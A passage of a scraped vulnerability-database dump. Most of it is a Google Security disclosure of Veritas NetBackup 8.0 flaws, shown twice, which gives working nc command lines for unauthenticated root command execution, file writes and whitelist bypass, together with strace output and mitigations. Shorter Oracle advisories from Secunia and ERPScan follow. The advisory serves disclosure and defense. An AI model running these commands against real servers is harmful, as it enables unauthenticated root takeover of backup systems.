/tmp/svbl.txt\", 27) = 27\r\n\r\nExecute the overwritten file:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337\r\n/usr/openv/netbackup/bin/initbprd foo\\n\" | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nStrace excerpt:\r\n\r\n\r\n\r\n[pid 1687] execve(\"/bin/sh\", [\"/bin/sh\",\r\n\"/usr/openv/netbackup/bin/initbprd\"], [/* 19 vars */]) = 0\r\nProcess 1688 attached\r\n[pid 1688] open(\"/tmp/svbl.txt\", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3\r\n[pid 1688] execve(\"/usr/bin/id\", [\"/usr/bin/id\"], [/* 19 vars */]) = 0\r\n\r\n# cat /tmp/svbl.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n\r\nA possible mitigation for this issue might be to either completely remove\r\nthe C_REMOTE_WRITE API or at least limit it to a very small number of\r\ndirectories that have no overlap with the C_REMOTE_EXECUTE whitelist and do\r\nnot contain any sensitive files like the bp.conf.\r\n\r\n\r\n\r\n---------------------------------------------------------------\r\n\r\nNB8-05: Bypass of DNS based security model through pbx_exchange\r\n\r\n---------------------------------------------------------------\r\n\r\nSeverity: High\r\n\r\n\r\n\r\nFor several API functions and service calls (e.g. bprd), NetBackup checks\r\nthe source IP of the request and matches it against a list of allowed\r\nClients. In most cases a request is only allowed from\r\n\r\n -\r\n\r\n localhost\r\n -\r\n\r\n NetBackup Server known to the local system\r\n -\r\n\r\n NetBackup Client known to the local system\r\n\r\n\r\n\r\nIt was discovered that the service pbx_exchange, listening on tcp/1556 can\r\nbe used to bypass this security check.\r\n\r\nExample:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\nfooa | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nThe above command sends the data afooa to the bprd service. The target\r\nservice is specified by the aextensiona parameter, everything after two new\r\nlines is forwarded to the extension service.\r\n\r\nThe previously described vulnerabilities in this report make use of this\r\nbehaviour.\r\n\r\n\r\n\r\nAs this functionality allows bypassing the source host based security model\r\nit is recommended to change the behaviour of pbx_exchange to forward the\r\noriginal source IP to the target service and modify the security checks to\r\nvalidate against that original source IP.\r\n\r\n\r\n\r\nAuthor\r\n\r\n======\r\n\r\nThe vulnerabilities were discovered by Sven Blumenstein and Xiaoran Wang\r\nfrom Google Security Team.\r\n\r\n\r\n\r\nTimeline\r\n\r\n========\r\n\r\n2017/02/06 - Security report sent to [email\u00a0protected] with 90 day\r\n disclosure deadline.\r\n\r\n2017/03/21 - Questions from Veritas on some issues were answered.\r\n\r\n2017/04/20 - Veritas announced an Advisory for customers will be published\r\non 2017/05/07 on veritas.com\r\n\r\n2017/05/07 - Advisory published by Veritas:\r\nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html\r\n\r\n2017/05/08 - Public disclosure of this security report.\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27741"}], "packetstorm": [{"lastseen": "2017-05-09T13:26:18", "description": "", "published": "2017-05-09T00:00:00", "type": "packetstorm", "title": "Veritas Netbackup 8.0 File Write / Remote Code Execution / Bypass", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-05-09T00:00:00", "id": "PACKETSTORM:142428", "href": "https://packetstormsecurity.com/files/142428/Veritas-Netbackup-8.0-File-Write-Remote-Code-Execution-Bypass.html", "sourceData": "`Veritas Netbackup 8.0 - Multiple Vulnerabilities \n \n------------------------------------------------- \n \n \n \nIntroduction \n \n============ \n \nMultiple vulnerabilities were identified in Veritas Netbackup ( \nhttps://www.veritas.com/product/backup-and-recovery/netbackup-8). The \nvulnerabilities were discovered during a black box security assessment and \ntherefore the vulnerability list should not be considered exhaustive. \n \n \n \nNetBackup 8.0 was assessed by Google Security as a followup to a previous \nassessment of NetBackup 6.x and 7.x (see \nhttp://seclists.org/fulldisclosure/2017/Feb/101). After assessing the \nsecurity of three generations of this software it unfortunately became \nclear that the current architecture of NetBackup has several security flaws: \n \n \n \n- \n \nThe proprietary protocol used between NB Clients and Servers provides no \nauthentication or encryption. \n- \n \nParameters passed to executable commands are (partially) processed \nunfiltered. \n- \n \nEven though a whitelisting for executable paths was added in recent \nversions of NetBackup, those paths contain over 600 (!) executables - a \nvulnerability in any of those could be leveraged to compromise a NetBackup \nsystem. \n- \n \nAll processes related to NetBackup run as root, which increases the risk \nof compromise (this was already reported in a previous advisory) \n \n \n \nWe highly recommended to put additional layers of security around running \nNetBackup installations, for example strong firewall policies that only \nallow legitimate NetBackup systems to interact with each other over the \nnetwork. \n \n \n \nPlease see the Advisory Veritas released for more information: \n \nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html \n \n \n \nVeritas also provides patches for NetBackup 8.0 that should be applied \nASAP. Those can be found at the following URL: \n \nhttps://www.veritas.com/support/en_US/article.000126389 \n \n \n \nAffected Software and Versions \n \n============================== \n \n- Veritas Netbackup 8.0 \n \n \n \nCVE \n \n=== \n \nCVEs have been assigned but are not published yet. Please see this Veritas \nadvisory for the CVE IDs: \nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html \n \n \n \nVulnerability Overview \n \n====================== \n \n \n \n1. NB8-01: HIGH: Unauthenticated privileged remote command execution via \nbprd \n \n2. NB8-02: HIGH: Unauthenticated privileged remote command execution via \nnbbsdtar \n \n3. NB8-03: HIGH: Unauthenticated privileged remote file write \n \n4. NB8-04: HIGH: Unauthenticated privileged remote command execution via \nwhitelist bypass \n \n5. NB8-05: HIGH: Bypass of DNS based security model through pbx_exchange \n \n \n \n \n \nVulnerability Details \n \n===================== \n \n \n \n-------------------------------------------------------------------- \n \nNB8-01: Unauthenticated privileged remote command execution via bprd \n \n-------------------------------------------------------------------- \n \nSeverity: High \n \n \n \nThe bprd process allows remote privileged remote code execution by sending \na special packet leveraging the C_PFI_ROTATION (0x70) command. This command \nis vulnerable to injecting arbitrary commands. This vulnerability bypasses \nthe directory whitelist implemented in NetBackup 7.x and allows privileged \nexecution of any command. \n \n \n \nThe following command executes a/usr/bin/id>/tmp/meh.txta on the Netbackup \nserver 10.128.0.5: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 112 1 2 foo\\`id>/tmp/meh.txt\\` \nbar baz 3 meh\\n\" | nc 10.128.0.5 1556 \n \n \n \nLog file excerpt: \n \n \n \n15:27:36.467 [31611.31611] <2> get_string: 329199 112 1 2 \nfoo`id>/tmp/meh.txt` bar baz 3 meh \n15:27:36.467 [31611.31611] <2> vnet_check_vxss_server_magic: \n[vnet_vxss_helper.c:641] VxSS magic=329199, remote_vxss=11 \n2 \n15:27:36.467 [31611.31611] <2> vnet_check_vxss_server_magic: \n[vnet_vxss_helper.c:698] Ignoring VxSS authentication 2 0x \n2 \n15:27:36.467 [31611.31611] <2> process_request: command C_PFI_ROTATION \n(112) received \n15:27:36.467 [31611.31611] <2> process_request: pfi_rotation request = \n329199 112 1 2 foo`id>/tmp/meh.txt` bar baz 3 me \nh \n \nStrace excerpt: \n \n \n \n[pid 31641] execve(\"/bin/sh\", [\"sh\", \"-c\", \n\"\\\"/usr/openv/netbackup/bin/admincmd/bppficorr\\\" -rotation -policy 2 \n-client 1 -fim \\\"foo`id>/tmp/meh.txt`\\\" 2>&1\"], [/* 18 vars */]) = 0 \nProcess 31642 attached \nProcess 31643 attached \n[pid 31643] execve(\"/bin/id\", [\"id\"], [/* 18 vars */]) = 0 \n \n# cat /tmp/meh.txt \nuid=0(root) gid=0(root) groups=0(root) \ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 \n \nThe validity of API parameters should be ensured by proper filtering of \npassed parameters. \n \n \n \n------------------------------------------------------------------------ \n \nNB8-02: Unauthenticated privileged remote command execution via nbbsdtar \n \n------------------------------------------------------------------------ \n \nSeverity: High \n \n \n \nThe binary nbbsdtar can be leveraged to copy any file to a whitelisted \ndirectory. This then allows leveraging the C_REMOTE_EXECUTE (0x46) to \nexecute the copied file. This vulnerability bypasses the directory \nwhitelist implemented in NetBackup 7.x and allows privileged execution of \nany command. \n \n \n \nPacking /bin/bash into the tar file /tmp/foo.tar: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337 \n/usr/openv/netbackup/bin/private/nbbsdtar foo -c -f /tmp/foo.tar \n/bin/bash\\n\" | nc 10.128.0.5 1556 \n \n \n \nStrace output: \n \n \n \n[pid 32461] execve(\"/usr/openv/netbackup/bin/private/nbbsdtar\", [\"foo\", \n\"-c\", \"-f\", \"/tmp/foo.tar\", \"/bin/bash\"], [/* 19 vars */]) = 0 \n \nUnpacking /tmp/foo.tar to the whitelisted directory \n/usr/openv/netbackup/bin (a/bina can be omitted as /bin/bash was added to \nthe tar with full path): \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337 \n/usr/openv/netbackup/bin/private/nbbsdtar foo -x -f /tmp/foo.tar -C \n/usr/openv/netbackup/\\n\" | nc 10.128.0.5 1556 \n \nStrace output: \n \n \n \n[pid 32486] execve(\"/usr/openv/netbackup/bin/private/nbbsdtar\", [\"foo\", \n\"-x\", \"-f\", \"/tmp/foo.tar\", \"-C\", \"/usr/openv/netbackup/\"], [/* 19 vars \n*/]) = 0 \n \n# ls -l /usr/openv/netbackup/bin/bash \n-rwxr-xr-x. 1 root root 960472 Dec 6 23:19 /usr/openv/netbackup/bin/bash \n \nExecution of any command by running the now whitelisted bash interpreter: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337 \n/usr/openv/netbackup/bin/bash foo -c id>/tmp/moo.txt\\n\" | nc 10.128.0.5 1556 \n \nStrace excerpt: \n \n \n \n[pid 32549] execve(\"/usr/openv/netbackup/bin/bash\", [\"foo\", \"-c\", \n\"id>/tmp/moo.txt\"], [/* 19 vars */]) = 0 \nProcess 32550 attached \n[pid 32550] execve(\"/bin/id\", [\"id\"], [/* 19 vars */]) = 0 \n \n# cat /tmp/moo.txt \nuid=0(root) gid=0(root) groups=0(root) \ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 \n \nEven with the added whitelist, the C_REMOTE_EXECUTE API still provides \naccess to over 600 (!) executable binaries. It is very likely that a number \nof these binaries can be leveraged to bypass the current security \nmechanisms and provide high risk attack vectors as shown in the example \nabove. \n \n \n \n---------------------------------------------------- \n \nNB8-03: Unauthenticated privileged remote file write \n \n---------------------------------------------------- \n \nSeverity: High \n \n \n \nThe bprd process allows remote privileged write to files by sending a \nspecial packet leveraging the C_REMOTE_WRITE (0x71) call. The attacker has \nfull control over file-name and content. The path is limited by a whitelist \ncheck that was implemented in NetBackup 7.x. As the C_REMOTE_WRITE function \ngives an attacker full control over content and filename and also allows \naappendinga to existing files, this issue is rated as HIGH. \n \n \n \nExample: \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 29 \n/usr/openv/netbackup/svbl.txt a 10 helloworld \\n\" | nc 10.128.0.5 1556 \n \n \n \nStrace excerpt: \n \n[pid 1027] open(\"/usr/openv/netbackup/svbl.txt\", \nO_WRONLY|O_CREAT|O_APPEND|O_DSYNC, 0666) = 7 \n[...] \n \n[pid 1027] write(7, \"helloworld\", 10) = 10 \n \n# cat /usr/openv/netbackup/svbl.txt \nhelloworld \n \n \n \n# ls -l /usr/openv/netbackup/svbl.txt \n-rw-r--r--. 1 root root 20 Feb 3 15:55 /usr/openv/netbackup/svbl.txt \n \nEven though the allowed paths are checked against a whitelist, the API is \nflexible enough to provide an attacker a useful entry point for further \nattacks. An API that allows full control over filename and content should \nnot be exposed to the network without authentication. \n \n \n \n-------------------------------------------------------------------------------- \n \nNB8-04: Unauthenticated privileged remote command execution via whitelist \nbypass \n \n-------------------------------------------------------------------------------- \n \nSeverity: High \n \n \n \nIn NetBackup 7.x, a whitelist was added to provide a layer of security \nagainst arbitrary command execution via APIs provided by NetBackup. \nFunctionality like the C_REMOTE_WRITE API are also checked against this \nwhitelist. The caveat here is that this whitelisting caused problems in \nproduction use. To counter that, Veritas added a configuration option to \nadd custom paths to the whitelist, as documented here: \nhttps://www.veritas.com/support/en_US/article.000100775 \n \n \n \nLeveraging the vulnerability described in NB8-03, it is possible to add any \npath to the whitelist, enabling an attacker to (over)write any file in the \nwhitelisted paths. The following attack chain shows an example that grants \nremote command execution. \n \n \n \nAdd a new whitelist entry to bp.conf: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 28 \n/usr/openv/netbackup/bp.conf a 48 BPCD_WHITELIST_PATH = \n/usr/openv/netbackup/bin \\x0d\\n\" | nc 10.128.0.5 1556 \n \n \n \nStrace excerpt: \n \n \n \n[pid 1550] open(\"/usr/openv/netbackup/bp.conf\", \nO_WRONLY|O_CREAT|O_APPEND|O_DSYNC, 0666) = 7 \n[...] \n \n[pid 1550] write(7, \"BPCD_WHITELIST_PATH = /usr/openv/netbackup/bin \\r\", \n48) = 48 \n \nWrite to the now whitelisted /usr/openv/netbackup/bin path and overwrite a \nexecutable file: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 33 \n/usr/openv/netbackup/bin/initbprd w 27 /usr/bin/id > /tmp/svbl.txt\\n\" | nc \n10.128.0.5 1556 \n \n \n \nStrace excerpt: \n \n[pid 1622] open(\"/usr/openv/netbackup/bin/initbprd\", \nO_WRONLY|O_CREAT|O_TRUNC|O_DSYNC, 0666) = 7 \n[...] \n \n[pid 1622] write(7, \"/usr/bin/id > /tmp/svbl.txt\", 27) = 27 \n \nExecute the overwritten file: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337 \n/usr/openv/netbackup/bin/initbprd foo\\n\" | nc 10.128.0.5 1556 \n \n \n \nStrace excerpt: \n \n \n \n[pid 1687] execve(\"/bin/sh\", [\"/bin/sh\", \n\"/usr/openv/netbackup/bin/initbprd\"], [/* 19 vars */]) = 0 \nProcess 1688 attached \n[pid 1688] open(\"/tmp/svbl.txt\", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3 \n[pid 1688] execve(\"/usr/bin/id\", [\"/usr/bin/id\"], [/* 19 vars */]) = 0 \n \n# cat /tmp/svbl.txt \nuid=0(root) gid=0(root) groups=0(root) \ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 \n \nA possible mitigation for this issue might be to either completely remove \nthe C_REMOTE_WRITE API or at least limit it to a very small number of \ndirectories that have no overlap with the C_REMOTE_EXECUTE whitelist and do \nnot contain any sensitive files like the bp.conf. \n \n \n \n--------------------------------------------------------------- \n \nNB8-05: Bypass of DNS based security model through pbx_exchange \n \n--------------------------------------------------------------- \n \nSeverity: High \n \n \n \nFor several API functions and service calls (e.g. bprd), NetBackup checks \nthe source IP of the request and matches it against a list of allowed \nClients. In most cases a request is only allowed from \n \n- \n \nlocalhost \n- \n \nNetBackup Server known to the local system \n- \n \nNetBackup Client known to the local system \n \n \n \nIt was discovered that the service pbx_exchange, listening on tcp/1556 can \nbe used to bypass this security check. \n \nExample: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\nfooa | nc 10.128.0.5 1556 \n \n \n \nThe above command sends the data afooa to the bprd service. The target \nservice is specified by the aextensiona parameter, everything after two new \nlines is forwarded to the extension service. \n \nThe previously described vulnerabilities in this report make use of this \nbehaviour. \n \n \n \nAs this functionality allows bypassing the source host based security model \nit is recommended to change the behaviour of pbx_exchange to forward the \noriginal source IP to the target service and modify the security checks to \nvalidate against that original source IP. \n \n \n \nAuthor \n \n====== \n \nThe vulnerabilities were discovered by Sven Blumenstein and Xiaoran Wang \nfrom Google Security Team. \n \n \n \nTimeline \n \n======== \n \n2017/02/06 - Security report sent to secure@veritas.com with 90 day \ndisclosure deadline. \n \n2017/03/21 - Questions from Veritas on some issues were answered. \n \n2017/04/20 - Veritas announced an Advisory for customers will be published \non 2017/05/07 on veritas.com \n \n2017/05/07 - Advisory published by Veritas: \nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html \n \n2017/05/08 - Public disclosure of this security report. \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142428/veritasnetbackup80-exec.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security 